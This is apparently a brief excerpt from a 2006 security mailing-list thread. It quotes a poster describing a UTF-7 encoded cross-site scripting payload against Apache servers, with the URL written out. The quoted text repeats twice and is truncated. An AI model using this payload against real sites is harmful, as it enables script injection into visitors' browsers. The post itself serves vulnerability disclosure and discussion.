On 10/2/06, Paul Szabo <psz (at) maths.usyd.edu (dot) au [email concealed]> wrote:
> This provides UXSS (Universal Cross-Site Scripting):
>
> http://apache.svr/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-/ZZZ...
>
> (with a couple of hundred Zs) will do what we want. Works for https also:
>
> https://apache.svr/+ADw-SCRIP...
> This provides UXSS (Universal Cross-Site Scripting):
>
> http://apache.svr/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-/ZZZ...
>
> (with a couple of hundred Zs) will do what we want. Works for https also:
>
> https://apache.svr/+ADw-SCRIP...
[ more ]